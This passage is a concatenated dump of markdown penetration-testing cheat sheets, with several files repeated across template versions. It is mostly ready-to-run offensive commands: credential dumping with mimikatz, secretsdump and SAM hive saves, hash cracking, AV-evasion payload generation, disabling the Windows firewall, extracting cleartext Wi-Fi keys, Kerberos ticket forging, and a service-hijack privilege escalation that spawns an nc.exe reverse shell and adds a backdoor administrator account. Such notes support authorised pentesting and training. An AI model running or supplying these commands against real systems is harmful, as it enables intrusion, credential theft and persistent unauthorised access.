AV/AMSI): 25 | 26 | - powershell -c (New-Object Net.WebClient).DownloadFile('http://172.21.0.0:port/file', 'output-file' 27 | - powershell -c Invoke-WebRequest -Uri "http://172.21.0.0" -OutFile "C:\path\file" 28 | 29 | 30 | Use Powercat: 31 | 32 | Send File: 33 | powercat -c 10.1.1.1 -p 443 -i C:\inputfile 34 | Recieve File: 35 | powercat -l -p 8000 -of C:\inputfile 36 | 37 | Linux: 38 | 39 | scp: 40 | 41 | - scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2 42 | 43 | scp through ssh: 44 | 45 | - scp -P 2322 passwords.txt remote_username@172.21.0.2:/remote/directory 46 | 47 | scp remote file to local system: 48 | 49 | - scp remote_username@172.21.0.2:/remote/file.txt /local/directory 50 | 51 | 52 | # Services to allow you to upload files to your system from the target: 53 | 54 | - SimpleHTTPServer Upload: https://gist.github.com/touilleMan/eb02ea40b93e52604938 55 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Transferring Files.md: -------------------------------------------------------------------------------- 1 | # Services to Host Files on your System: 2 | 3 | General Options: 4 | 5 | FTP: 6 | 7 | Install pyftpdlib 8 | - pip3 install pyftpdlib 9 | 10 | Pure-ftpd 11 | - sudo apt install pure-ftpd 12 | - service pure-ftpd start 13 | 14 | Run (-w flag allows anonymous write access) 15 | - Python3 -m pyftpdlib -p 21 -w 16 | 17 | Web: 18 | 19 | - Python3 -m http.server 443 20 | - service apache2 start 21 | 22 | Powershell: 23 | 24 | Raw (Will get flagged by AV/AMSI): 25 | 26 | - powershell -c (New-Object Net.WebClient).DownloadFile('http://172.21.0.0:port/file', 'output-file' 27 | - powershell -c Invoke-WebRequest -Uri "http://172.21.0.0" -OutFile "C:\path\file" 28 | 29 | 30 | Use Powercat: 31 | 32 | Send File: 33 | powercat -c 10.1.1.1 -p 443 -i C:\inputfile 34 | Recieve File: 35 | powercat -l -p 8000 -of C:\inputfile 36 | 37 | Linux: 38 | 39 | scp: 40 | 41 | - scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2 42 | 43 | scp through ssh: 44 | 45 | - scp -P 2322 passwords.txt remote_username@172.21.0.2:/remote/directory 46 | 47 | scp remote file to local system: 48 | 49 | - scp remote_username@172.21.0.2:/remote/file.txt /local/directory 50 | 51 | 52 | # Services to allow you to upload files to your system from the target: 53 | 54 | - SimpleHTTPServer Upload: https://gist.github.com/touilleMan/eb02ea40b93e52604938 55 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/02. SSH/Enumerating SSH.md: -------------------------------------------------------------------------------- 1 | # Manual Connection 2 | 3 | ``` 4 | $ ssh 172.21.0.0 -p22 5 | $ nc -nv 172.21.0.0 22 # Might give header 6 | ``` 7 | 8 | # SSH Enumeration Tools 9 | 10 | ## Nmap Enumeration 11 | ``` 12 | $ ls -lh /usr/share/nmap/scripts/ | grep ssh 13 | -rw-r--r-- 1 root root 5.3K Oct 12 09:29 ssh2-enum-algos.nse 14 | -rw-r--r-- 1 root root 1.2K Oct 12 09:29 ssh-auth-methods.nse 15 | -rw-r--r-- 1 root root 3.0K Oct 12 09:29 ssh-brute.nse 16 | -rw-r--r-- 1 root root 16K Oct 12 09:29 ssh-hostkey.nse 17 | -rw-r--r-- 1 root root 5.9K Oct 12 09:29 ssh-publickey-acceptance.nse 18 | -rw-r--r-- 1 root root 3.7K Oct 12 09:29 ssh-run.nse 19 | -rw-r--r-- 1 root root 1.4K Oct 12 09:29 sshv1.nse 20 | 21 | $ nmap 172.21.0.0 -p 22 -sV ssh-hostkey --script-args ssh_hostkey=full 22 | $ nmap 172.21.0.0 -p 22 -sV ssh-auth-methods --script-args="ssh.user=root" 23 | ``` 24 | 25 | ## Crackmapexec 26 | 27 | ``` 28 | - crackmapexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce 29 | - crackmapexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce -x whoami 30 | ``` 31 | 32 | ## SSH Audit: 33 | Source: https://github.com/jtesta/ssh-audit 34 | 35 | ``` 36 | python ssh-audit.py [-1246pbcnjvlt] 172.21.0.0 37 | ``` 38 | 39 | ## Metasploit 40 | ``` 41 | Auxilary Modules: 42 | auxiliary/scanner/ssh/ssh_version 43 | use scanner/ssh/ssh_enumusers 44 | ``` 45 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md: -------------------------------------------------------------------------------- 1 | 2 | ## BENCHMARK TEST (HASH TYPE) 3 | 4 | - hashcat -b -m #type 5 | 6 | ## SHOW EXAMPLE HASH 7 | 8 | - hashcat -m #type --example-hashes 9 | 10 | ## DICTIONARY ATTACK 11 | 12 | - hashcat -a 0 -m #type hash.txt dict.txt 13 | 14 | DICTIONARY + RULES ATTACK 15 | 16 | - hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt 17 | 18 | COMBINATION ATTACK 19 | 20 | - hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt 21 | 22 | ## MASK ATTACK 23 | 24 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a 25 | 26 | HYBRID DICTIONARY + MASK 27 | 28 | - hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a 29 | 30 | HYBRID MASK + DICTIONARY 31 | 32 | - hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt 33 | 34 | 35 | ## INCREMENT 36 | 37 | DEFAULT INCREMENT 38 | 39 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment 40 | 41 | INCREMENT MINIMUM LENGTH 42 | 43 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4 44 | 45 | INCREMENT MAX LENGTH 46 | 47 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5 48 | 49 | SESSION RESTORE 50 | 51 | - hashcat -a 0 -m #type --restore --session hash.txt dict.txt 52 | 53 | 54 | ## Cracking krb5ts Keys 55 | 56 | - hashcat -m 13100 --force 57 | 58 | ## Cracking Asrep keys 59 | 60 | - hashcat -a 0 -m 18200 61 | 62 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md: -------------------------------------------------------------------------------- 1 | 2 | ## BENCHMARK TEST (HASH TYPE) 3 | 4 | - hashcat -b -m #type 5 | 6 | ## SHOW EXAMPLE HASH 7 | 8 | - hashcat -m #type --example-hashes 9 | 10 | ## DICTIONARY ATTACK 11 | 12 | - hashcat -a 0 -m #type hash.txt dict.txt 13 | 14 | DICTIONARY + RULES ATTACK 15 | 16 | - hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt 17 | 18 | COMBINATION ATTACK 19 | 20 | - hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt 21 | 22 | ## MASK ATTACK 23 | 24 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a 25 | 26 | HYBRID DICTIONARY + MASK 27 | 28 | - hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a 29 | 30 | HYBRID MASK + DICTIONARY 31 | 32 | - hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt 33 | 34 | 35 | ## INCREMENT 36 | 37 | DEFAULT INCREMENT 38 | 39 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment 40 | 41 | INCREMENT MINIMUM LENGTH 42 | 43 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4 44 | 45 | INCREMENT MAX LENGTH 46 | 47 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5 48 | 49 | SESSION RESTORE 50 | 51 | - hashcat -a 0 -m #type --restore --session hash.txt dict.txt 52 | 53 | 54 | ## Cracking krb5ts Keys 55 | 56 | - hashcat -m 13100 --force 57 | 58 | ## Cracking Asrep keys 59 | 60 | - hashcat -a 0 -m 18200 61 | 62 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Hashcat.md: -------------------------------------------------------------------------------- 1 | 2 | ## BENCHMARK TEST (HASH TYPE) 3 | 4 | - hashcat -b -m #type 5 | 6 | ## SHOW EXAMPLE HASH 7 | 8 | - hashcat -m #type --example-hashes 9 | 10 | ## DICTIONARY ATTACK 11 | 12 | - hashcat -a 0 -m #type hash.txt dict.txt 13 | 14 | DICTIONARY + RULES ATTACK 15 | 16 | - hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt 17 | 18 | COMBINATION ATTACK 19 | 20 | - hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt 21 | 22 | ## MASK ATTACK 23 | 24 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a 25 | 26 | HYBRID DICTIONARY + MASK 27 | 28 | - hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a 29 | 30 | HYBRID MASK + DICTIONARY 31 | 32 | - hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt 33 | 34 | 35 | ## INCREMENT 36 | 37 | DEFAULT INCREMENT 38 | 39 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment 40 | 41 | INCREMENT MINIMUM LENGTH 42 | 43 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4 44 | 45 | INCREMENT MAX LENGTH 46 | 47 | - hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5 48 | 49 | SESSION RESTORE 50 | 51 | - hashcat -a 0 -m #type --restore --session hash.txt dict.txt 52 | 53 | 54 | ## Cracking krb5ts Keys 55 | 56 | - hashcat -m 13100 --force 57 | 58 | ## Cracking Asrep keys 59 | 60 | - hashcat -a 0 -m 18200 61 | 62 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/01. FTP/Enumerating FTP.md: -------------------------------------------------------------------------------- 1 | # General Notes: 2 | Always try anonymous login if it is avaliable: 3 | 4 | Username: anonymous 5 | Password: anonymous (or keys you want to put in.) 6 | 7 | # FTP Enumeration Tools 8 | ## Manual Connection 9 | ``` 10 | $ ftp 172.21.0.0 11 | ``` 12 | ``` 13 | $ nc -vn 172.21.0.0 21 14 | ``` 15 | ## Connect via Browser 16 | ``` 17 | ftp://172.21.0.0 18 | ``` 19 | 20 | ## Nmap FTP Enumeration 21 | ``` 22 | 23 | $ ls -lh /usr/share/nmap/scripts/ | grep ftp 24 | -rw-r--r-- 1 root root 4.5K Oct 12 09:29 ftp-anon.nse 25 | -rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-bounce.nse 26 | -rw-r--r-- 1 root root 3.1K Oct 12 09:29 ftp-brute.nse 27 | -rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-libopie.nse 28 | -rw-r--r-- 1 root root 3.3K Oct 12 09:29 ftp-proftpd-backdoor.nse 29 | -rw-r--r-- 1 root root 3.7K Oct 12 09:29 ftp-syst.nse 30 | -rw-r--r-- 1 root root 5.9K Oct 12 09:29 ftp-vsftpd-backdoor.nse 31 | -rw-r--r-- 1 root root 5.8K Oct 12 09:29 ftp-vuln-cve2010-4221.nse 32 | -rw-r--r-- 1 root root 5.7K Oct 12 09:29 tftp-enum.nse 33 | $ nmap x.x.x.x -p 21 -sV --script=exampleScript1.nse,exampleScript2.nse 34 | ``` 35 | 36 | ## CrackMapExec 37 | 38 | ``` 39 | - crackmapexec ftp 172.21.0.0 40 | - crackmap exec ftp 172.21.0.0 -u 'a' -p '' 41 | - crackmapexec ftp 172.21.0.0 -u 'anonymous' -p ''' 42 | 43 | # FTP Default wordlists: 44 | /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 45 | 46 | ``` 47 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypassing AV.md: -------------------------------------------------------------------------------- 1 | ## Veil Framework: 2 | 3 | Install on Kali: 4 | - apt install veil 5 | - /usr/share/veil/config/setup.sh --force --silent 6 | 7 | Reference: https://github.com/Veil-Framework/Veil 8 | 9 | ## Shellter 10 | 11 | Source: https://www.shellterproject.com/download/ 12 | 13 | - apt install shellter 14 | 15 | 16 | ## Sharpshooter 17 | 18 | Javascript Payload Stageless: 19 | - SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3 20 | 21 | Stageless HTA Payload: 22 | 23 | - SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee 24 | 25 | Staged VBS: 26 | 27 | - SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4 28 | 29 | Reference: https://github.com/mdsecactivebreach/SharpShooter 30 | 31 | ## Donut: 32 | 33 | Source: https://github.com/TheWover/donut 34 | 35 | ## Vulcan 36 | 37 | Source: https://github.com/praetorian-code/vulcan 38 | 39 | 40 | ## Scarecrow 41 | 42 | Source: https://github.com/optiv/ScareCrow 43 | 44 | In Kali: 45 | 46 | sudo apt install golang 47 | 48 | go get github.com/fatih/color 49 | go get github.com/yeka/zip 50 | go get github.com/josephspurrier/goversioninfo 51 | 52 | go build ScareCrow.go 53 | 54 | ./ScareCrow 55 | 56 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Dumping Hashes.md: -------------------------------------------------------------------------------- 1 | # Windows: 2 | 3 | ## Meterpreter HashDump 4 | 5 | - run post/windows/gather/hashdump 6 | 7 | ## Meterpreter Mimikatz (Post Exploitation must be executed from SYSTEM privileges) 8 | 9 | - load mimikatz 10 | - creds_all 11 | 12 | DUMP LSA SECRETS 13 | - lsadump.py sys_backup.hiv sec_backup.hiv 14 | 15 | DUMP LOCAL PASSWORD HASHES 16 | 17 | - pwdump.py sys_backup.hiv sec_backup.hiv 18 | 19 | ## reg.exe 20 | 21 | - reg save HKLM\sam sam 22 | - reg save HKLM\system system 23 | 24 | ## samdump2 25 | 26 | - samdump2 SYSTEM SAM > hashes.db 27 | 28 | ## Impacket Tools: 29 | 30 | - secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes 31 | 32 | If you have the NTDS.dit file and the SYSTEM hive: 33 | 34 | - secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL 35 | 36 | # Linux 37 | 38 | Requires Root Privileges 39 | 40 | - cat /etc/shadow 41 | 42 | - cp /etc/passwd and shadow 43 | - unshadow passwd shadow 44 | 45 | # OSX 46 | 47 | 10.5-10.7 48 | 49 | - dscl localhost -read /Search/Users/|grep GeneratedUID|cut -c15-cat 50 | /var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt 51 | 52 | 10.8-10.12 53 | 54 | - sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData|tr -dc ‘ 55 | 0-9a-f’|xxd -p -r|plutil -convert xml1 - -o - 56 | 57 | # Other Resources: 58 | 59 | - Lsassy: https://github.com/Hackndo/lsassy -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Dumping Hashes.md: -------------------------------------------------------------------------------- 1 | # Windows: 2 | 3 | ## Meterpreter HashDump 4 | 5 | - run post/windows/gather/hashdump 6 | 7 | ## Meterpreter Mimikatz (Post Exploitation must be executed from SYSTEM privileges) 8 | 9 | - load mimikatz 10 | - creds_all 11 | 12 | DUMP LSA SECRETS 13 | - lsadump.py sys_backup.hiv sec_backup.hiv 14 | 15 | DUMP LOCAL PASSWORD HASHES 16 | 17 | - pwdump.py sys_backup.hiv sec_backup.hiv 18 | 19 | ## reg.exe 20 | 21 | - reg save HKLM\sam sam 22 | - reg save HKLM\system system 23 | 24 | ## samdump2 25 | 26 | - samdump2 SYSTEM SAM > hashes.db 27 | 28 | ## Impacket Tools: 29 | 30 | - secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes 31 | 32 | If you have the NTDS.dit file and the SYSTEM hive: 33 | 34 | - secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL 35 | 36 | # Linux 37 | 38 | Requires Root Privileges 39 | 40 | - cat /etc/shadow 41 | 42 | - cp /etc/passwd and shadow 43 | - unshadow passwd shadow 44 | 45 | # OSX 46 | 47 | 10.5-10.7 48 | 49 | - dscl localhost -read /Search/Users/|grep GeneratedUID|cut -c15-cat 50 | /var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt 51 | 52 | 10.8-10.12 53 | 54 | - sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData|tr -dc ‘ 55 | 0-9a-f’|xxd -p -r|plutil -convert xml1 - -o - 56 | 57 | # Other Resources: 58 | 59 | - Lsassy: https://github.com/Hackndo/lsassy -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Dumping Hashes.md: -------------------------------------------------------------------------------- 1 | # Windows: 2 | 3 | ## Meterpreter HashDump 4 | 5 | - run post/windows/gather/hashdump 6 | 7 | ## Meterpreter Mimikatz (Post Exploitation must be executed from SYSTEM privileges) 8 | 9 | - load mimikatz 10 | - creds_all 11 | 12 | DUMP LSA SECRETS 13 | - lsadump.py sys_backup.hiv sec_backup.hiv 14 | 15 | DUMP LOCAL PASSWORD HASHES 16 | 17 | - pwdump.py sys_backup.hiv sec_backup.hiv 18 | 19 | ## reg.exe 20 | 21 | - reg save HKLM\sam sam 22 | - reg save HKLM\system system 23 | 24 | ## samdump2 25 | 26 | - samdump2 SYSTEM SAM > hashes.db 27 | 28 | ## Impacket Tools: 29 | 30 | - secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes 31 | 32 | If you have the NTDS.dit file and the SYSTEM hive: 33 | 34 | - secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL 35 | 36 | # Linux 37 | 38 | Requires Root Privileges 39 | 40 | - cat /etc/shadow 41 | 42 | - cp /etc/passwd and shadow 43 | - unshadow passwd shadow 44 | 45 | # OSX 46 | 47 | 10.5-10.7 48 | 49 | - dscl localhost -read /Search/Users/|grep GeneratedUID|cut -c15-cat 50 | /var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt 51 | 52 | 10.8-10.12 53 | 54 | - sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData|tr -dc ‘ 55 | 0-9a-f’|xxd -p -r|plutil -convert xml1 - -o - 56 | 57 | # Other Resources: 58 | 59 | - Lsassy: https://github.com/Hackndo/lsassy -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Editable Services/General Notes.md: -------------------------------------------------------------------------------- 1 | # Editable Service 2 | 3 | If you find a service that is editable (WinPEAS can help here to find such services) you can edit the binpath to point to nc.exe to get a reverse shell. 4 | 5 | Steps also described here: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc 6 | 7 | Note: in both my experiences using this, this does get shell, but it closes in a few seconds. 8 | 9 | 1. Upload `nc.exe` to a writable directory. 10 | 2. `sc config usosvc binpath= "C:\Inetpub\wwwroot\nc.exe -nv 9988 -e C:\Windows\System32\cmd.exe"` 11 | 3. `sc config usosvc obj= ".\LocalSystem" password= ""` 12 | - I didn't need this second time using it 13 | 5. `sc config usosvc start= "demand"` 14 | 6. `nc -lvp 9988` (setup listener on kali) 15 | 7. `net start usosvc` 16 | 8. R00T! 17 | 18 | Since shell closes soon, add new admin user: 19 | 1. `net user hacker h@ck3r%93 /add` 20 | 2. `net localgroup administrators hacker /add` 21 | 22 | Now RDP/ssh with new creds (if services are available, or you can open them yourself): 23 | 1. `rdesktop ` 24 | 2. R00T! 25 | 26 | The shell closes due to a Windows timeout variable in the registry that defines how long to wait for a service to response. If you're in a position to edit that (i.e. ssh/rdp not enabled) this would stabilize the shell. 27 | If you don’t want to edit the registry, since you're admin for a bit with this shell, you could try enabling RDP or SSH. -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | # Linux Commands to run: 2 | 3 | - top 4 | - htop 5 | - ps -e 6 | - ps aux 7 | - ps aux | more 8 | - ps aux | less 9 | 10 | # Finding processes 11 | 12 | - pgrep 13 | 14 | # Terminating a Process 15 | 16 | - kill 17 | - kill -9 PID 18 | - pkill processName 19 | - killall 20 | 21 | # Kill user tty/pts sessions in Linux 22 | 23 | ## Commands 24 | 25 | - `w`: show who is logged on and what they are doing 26 | - `who`: show who is logged on 27 | - `tty`: show current users pseudo terminal 28 | - `ps -ft pts/1`: get process id for the pseudo terminal 29 | - `pkill`: signal process based on name and other attributes 30 | 31 | 1. Check active users logged into the server with: `w` 32 | ``` 33 | 16:53:37 up 23:46, 2 users, load average: 0.00, 0.00, 0.00 34 | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 35 | debian pts/1 24.69.132.96 16:45 0.00s 0.04s 0.00s w 36 | debain pts/2 24.69.132.96:S.0 16:35 16.00s 0.02s 0.02s /bin/bash 37 | ``` 38 | 2. Get the PID (Process ID) of a connected terminal (tty) with: `ps -ft pts/1` 39 | ``` 40 | UID PID PPID C STIME TTY TIME CMD 41 | debian 28580 28102 0 16:45 pts/1 00:00:00 -bash 42 | debian 29081 28580 0 16:55 pts/1 00:00:00 ps -ft pts/1 43 | ``` 44 | 3. Kill the process: `kill 28580` 45 | 46 | 4. Alternatively use `pkill -t pts/1` 47 | 48 | # Tools to check for running processes: 49 | 50 | ## pspy 51 | 52 | Source: https://github.com/DominicBreuker/pspy/releases/ 53 | 54 | - pspy --help 55 | 56 | 57 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # PowerShell 2 | 3 | ``` 4 | Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize 5 | ``` 6 | 7 | ## Obtaining a list of programs from a remote system: 8 | 9 | - ```Invoke-command -computer remote_pc_name {Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize }``` 10 | 11 | ## Here is a script that will pull a list of software that is installed on the users system: 12 | 13 | ``` 14 | $listsoftware= Get-ChildItem HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall 15 | 16 | $names = $listsoftware |foreach-object {Get-ItemProperty $_.PsPath} 17 | 18 | foreach ($name in $names) 19 | { 20 | Write-Host $name.Displayname 21 | } 22 | ``` 23 | 24 | ## WMI: 25 | 26 | - ```Get-WmiObject -Class Win32_Product | Select-Object -Property Name > C:\InstalledSoftwareList.txt ``` 27 | 28 | ## Reviewing Installed Windows Features 29 | 30 | - ```Get-WindowsFeature | Where-Object {$_.InstallState -eq 'Installed'}``` 31 | 32 | # Wmic 33 | 34 | ## Note: Microsoft has planned to deprecrate this program in new versions of Windows. The commands used can be slow to run but it will return the results it needed: 35 | 36 | - wmic /output:C:\InstalledSoftwareList.txt product get name,version 37 | 38 | ## Saving it to a text file: 39 | 40 | - wmic product get name,version /format:csv > C:\InstalledSoftware.csv -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | ## List all network interfaces, IP, and DNS. 2 | 3 | - ipconfig /all 4 | - Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address 5 | - Get-DnsClientServerAddress -AddressFamily IPv4 | ft 6 | 7 | 8 | ## List all current connections 9 | 10 | netstat -nao 11 | 12 | ## List firewall state and current configuration 13 | 14 | - netsh advfirewall firewall dump 15 | - netsh firewall show state 16 | - netsh firewall show config 17 | 18 | # List firewall's blocked ports 19 | 20 | - $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports 21 | 22 | # Disable firewall 23 | 24 | - netsh firewall set opmode disable (Older Versions of Windows) 25 | - netsh advfirewall set allprofiles state off 26 | 27 | ## List current routing table 28 | 29 | - route print 30 | - Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex 31 | 32 | ## List the ARP table 33 | 34 | - arp -A 35 | - Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State 36 | 37 | ## List all network shares 38 | 39 | - net share 40 | 41 | ## Wifi Passwords: 42 | 43 | Finding the SSID: 44 | - netsh wland show profile 45 | 46 | Obtaining the cleartext password: 47 | - netsh wlan show profile key=clear 48 | - cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on 49 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Mimikatz.md: -------------------------------------------------------------------------------- 1 | # Mimikatz 2 | 3 | Post exploitation commands must be executed from SYSTEM level privileges. 4 | - mimikatz # privilege::debug 5 | - mimikatz # token::whoami 6 | - mimikatz # token::elevate 7 | - mimikatz # lsadump::sam 8 | - mimikatz # sekurlsa::logonpasswords 9 | 10 | ## Pass The Hash 11 | 12 | - mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash 13 | 14 | ## Inject generated TGS key 15 | 16 | - mimikatz # kerberos::ptt 17 | 18 | ## Generating a silver ticket 19 | 20 | AES 256 Key: 21 | 22 | - mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target: 23 | 24 | AES 128 Key: 25 | 26 | - mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target: 27 | 28 | NTLM: 29 | 30 | - mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target: 31 | 32 | 33 | ## Generating a Golden Ticket 34 | 35 | AES 256 Key: 36 | 37 | - mimikatz # kerberos::golden /domain:/sid: /aes256: /user: 38 | 39 | AES 128 Key: 40 | 41 | - mimikatz # kerberos::golden /domain:/sid: /aes128: /user: 42 | 43 | NTLM: 44 | 45 | - mimikatz # kerberos::golden /domain:/sid: /rc4: /user: 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Mimikatz.md: -------------------------------------------------------------------------------- 1 | # Mimikatz 2 | 3 | Post exploitation commands must be executed from SYSTEM level privileges. 4 | - mimikatz # privilege::debug 5 | - mimikatz # token::whoami 6 | - mimikatz # token::elevate 7 | - mimikatz # lsadump::sam 8 | - mimikatz # sekurlsa::logonpasswords 9 | 10 | ## Pass The Hash 11 | 12 | - mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash 13 | 14 | ## Inject generated TGS key 15 | 16 | - mimikatz # kerberos::ptt 17 | 18 | ## Generating a silver ticket 19 | 20 | AES 256 Key: 21 | 22 | - mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target: 23 | 24 | AES 128 Key: 25 | 26 | - mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target: 27 | 28 | NTLM: 29 | 30 | - mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target: 31 | 32 | 33 | ## Generating a Golden Ticket 34 | 35 | AES 256 Key: 36 | 37 | - mimikatz # kerberos::golden /domain:/sid: /aes256: /user: 38 | 39 | AES 128 Key: 40 | 41 | - mimikatz # kerberos::golden /domain:/sid: /aes128: /user: 42 | 43 | NTLM: 44 | 45 | - mimikatz # kerberos::golden /domain:/sid: /rc4: /user: 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # PowerShell 2 | 3 | ``` 4 | Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize 5 | ``` 6 | 7 | ## Obtaining a list of programs from a remote system: 8 | 9 | - ```Invoke-command -computer remote_pc_name {Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize }``` 10 | 11 